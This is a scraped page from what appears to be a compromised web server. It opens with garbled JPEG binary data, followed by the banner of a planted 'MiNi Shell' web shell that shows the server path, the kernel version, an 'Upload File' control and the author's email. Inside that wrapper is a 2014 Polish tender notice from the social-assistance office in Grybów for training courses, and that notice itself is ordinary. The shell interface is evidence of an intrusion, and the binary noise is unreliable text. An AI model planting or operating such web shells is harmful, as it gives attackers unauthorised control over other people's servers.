JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/62931-N-2014.html

<p class="kh_header"><b>Grybów: Organizacja i przeprowadzenie Kursu kompetencji społecznych, Kursu motywacji do działania, Kursu podniesienia kompetencji rodzicielskich oraz Treningu kompetencji  życiowych dla Beneficjentów Ostatecznych biorących udział  
w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pn: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach EFS</b><br>
<b>Numer ogłoszenia: 62931 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Grybowie , ul. Jakubowskiego 33, 33-330 Grybów, woj. małopolskie, tel. 18 448 42 46, faks 18 448 42 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie Kursu kompetencji społecznych, Kursu motywacji do działania, Kursu podniesienia kompetencji rodzicielskich oraz Treningu kompetencji  życiowych dla Beneficjentów Ostatecznych biorących udział  
w realizowanych przez Gminny Ośrodek Pomocy Społecznej w Grybowie projekcie systemowym PO KL pn: Nowe perspektywy - nowe szanse!, na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1, współfinansowanego ze środków Unii Europejskiej w ramach EFS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie Kursu kompetencji społecznych, Kursu motywacji do działania, Kursu  kompetencji rodzicielskich oraz Treningu kompetencji  życiowych dla 50 osób z terenu Gminy Grybów             
w ramach projektu systemowego Programu Operacyjnego Kapitał Ludzki pt: Nowe perspektywy - nowe szanse!, zadanie 1 Aktywna integracja. Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Grybowie w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7. 1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

2. Program szkolenia winien być przeprowadzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług na rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.).

3. Przedmiot zamówienia został opisany poniżej i obejmuje opracowanie zakresu tematycznego Kursu kompetencji społecznych, Kursu motywacji do działania, Kursu  kompetencji rodzicielskich oraz Treningu kompetencji  życiowych dla osób uczestniczących w projekcie w następujący sposób:

a) Kurs kompetencji społecznych:
Celem szkolenia jest:
- nabycie podstawowych umiejętności i kompetencji społecznych,
- dostarczenie wiedzy w zakresie: komunikacji interpersonalnej, treningu asertywności             i umiejętności społecznych oraz powstawania konfliktów i sposobów ich rozwiązywania,
- nabycie podstawowych umiejętności dobrej komunikacji interpersonalnej,
- nabycie umiejętności radzenia sobie w sytuacjach trudnych oraz bycia asertywnym,
Tematyka szkolenia powinna obejmować:
- podstawowe informacje dotyczące dobrej komunikacji, jej cechy, zakłócenia,
- skuteczne komunikowanie się ludźmi,
- radzenie sobie w sytuacjach trudnych,
- asertywność, jej definicje, najważniejsze elementy, asertywność w życiu i w pracy,
- konflikty i sposoby ich rozwiązywania,
- budowanie własnego wizerunku przez komunikację,
- kreacja własnego wizerunku, autoprezentacja,
- pisanie podań o pracę i CV,
- zaaranżowana rozmowa z przykładowym pracodawcą,
Liczba godzin szkoleniowych grupowych (dla grupy 32 osób - 2 grupy szkoleniowe - minimum 18 godzin            w ciągu 3 dni).
Za godzinę zegarową Treningu kompetencji społecznych przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

b) Kursu motywacji do działania
Celem szkolenia jest Celem szkolenia jest zwiększenie satysfakcji i skuteczności w życiu zawodowym i prywatnym poprzez zwiększenie świadomości oraz wiedzy uczestników z zakresu motywacji oraz sposobów motywowania innych i automotywacji oraz nauka umiejętności stawiania celów i planowania ich skutecznej realizacji.
Liczba godzin szkoleniowych grupowych (dla grupy 30 osób - 2 grupy szkoleniowe - minimum 18 godzin             w ciągu 3 dni).
Za godzinę zegarową Kursu motywacji do działania przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.



c) Kurs kompetencji rodzicielskich
Celem szkolenia jest:
- przekazanie wiedzy na temat wychowania dzieci jako procesu długotrwałego, zmiennego     w swoich treściach i formach, 

- przedstawienie metod i technik wychowania, zadań rodzicielskich względem dzieci sposobu i środków oddziaływania na dzieci w taki sposób, by jego rozwój przebiegał harmonijnie,
- przedstawienie roli rodzica w wychowaniu dziecka, technik aktywnego słuchania                   i wyrażania swoich emocji,
- nauczenie nawiązywania efektywnej współpracy z dzieckiem,
- nauczenie umiejętności aktywnego słuchania i akceptacji uczuć,
- nauczenie wspierania procesu usamodzielniania się dzieci,
- nauczenie wyciągania konsekwencji z niewłaściwego zachowania w miejsce karania,
- nauczenie zauważania potrzeb swoich dzieci i umiejętności odpowiadania na nie,
- nauczenie modyfikowania niepożądanych lub nieodpowiednich zachowań bez zastosowania przemocy,
Tematyka szkolenia powinna obejmować:
- cele wychowawcze,
- podstawy rodzicielskie,
- ochrona własnych granic,
- aktywne słuchanie,
- potwierdzanie uczuć - ćwiczenia,
- stosowanie nagród i kar,
- postawy rodzicielskie,
- analiza sytuacji konfliktowych,
Liczba godzin szkoleniowych grupowych (dla grupy 18 osób - minimum 18 godzin             w ciągu 3 dni).
Za godzinę zegarową Kursu podniesienia kompetencji rodzicielskich przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy.

d) Trening kompetencji życiowych:
Celem szkolenia jest:
- przywrócenie uczestnikom samodzielności życiowej,
- skupienie uwagi na wadze zarządzania własnymi zasobami (m.in. czasem, budżetem itp.)    w realizacji wytyczonych sobie celów,
- udzielenie informacji o prawach i uprawnieniach,
- umiejętność wypełniania druków urzędowych i odpowiadania na pisma urzędowe,
Tematyka szkolenia powinna obejmować:
- rozumienie sytuacji społecznych,
- sposoby radzenia sobie ze stresem,
- gospodarowanie własnym czasem,
- prowadzenie budżetu domowego,
- wypełnianie podstawowych druków urzędowych i odpowiadanie na pisma urzędowe,
- uzyskanie wiadomości dotyczących praw i uprawnień Beneficjentów Ostatecznych,
Liczba godzin szkoleniowych grupowych (dla grupy 20 osób - minimum 18 godzin            w ciągu 3 dni).
Za godzinę zegarową Treningu kompetencji życiowych przyjmuje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.

Ocena tego warunku nastąpi na podstawie złożonego przez Wykonawcę w tym zakresie oświadczenia  Załącznik Nr 7 do SIWZ , wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- za spełnienie tego warunku Zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem składania ofert, co najmniej dwóch różnych usług, polegających na zorganizowaniu i przeprowadzeniu Kursu kompetencji społecznych, Kursu motywacji do działania, Kursu podniesienia kompetencji rodzicielskich oraz Treningu kompetencji  życiowych o tematyce zgodnej z wyszczególnioną             w niniejszym zamówieniu w oparciu o tą, którą określono w Dziale 2 SIWZ, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane (według wzoru stanowiącego Załącznik Nr 5 do SIWZ) przy jednoczesnym braku usług wykonanych nienależycie.

Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- za spełnienie powyższego warunku, Zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa - według wzoru stanowiącego Załącznik Nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, posiadających kwalifikacje zawodowe niezbędne do realizacji zamówienia tj.:
- co najmniej trener - psycholog lub osoba posiadająca uprawnienia do prowadzenia szkoleń    z zakresu umiejętności psychospołecznych, minimum 2 - letnie doświadczenie w pracy terapeutycznej 

Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) oraz wykazu kadry zawodowej proponowanej do wykonania usług (Załącznik Nr 6 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy.

Ocena tego warunku nastąpi na podstawie złożonego przez Wykonawcę w tym zakresie oświadczenia  Załącznik Nr 7 do SIWZ , wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 3 do SIWZ) Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/goposgrybow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINNY  OŚRODEK  POMOCY SPOŁECZNEJ w Grybowie
ul. Jakubowskiego 33, 
33-330 Grybów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 08:00, miejsce: GMINNY  OŚRODEK  POMOCY SPOŁECZNEJ w Grybowie
ul. Jakubowskiego 33, 
33-330 Grybów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com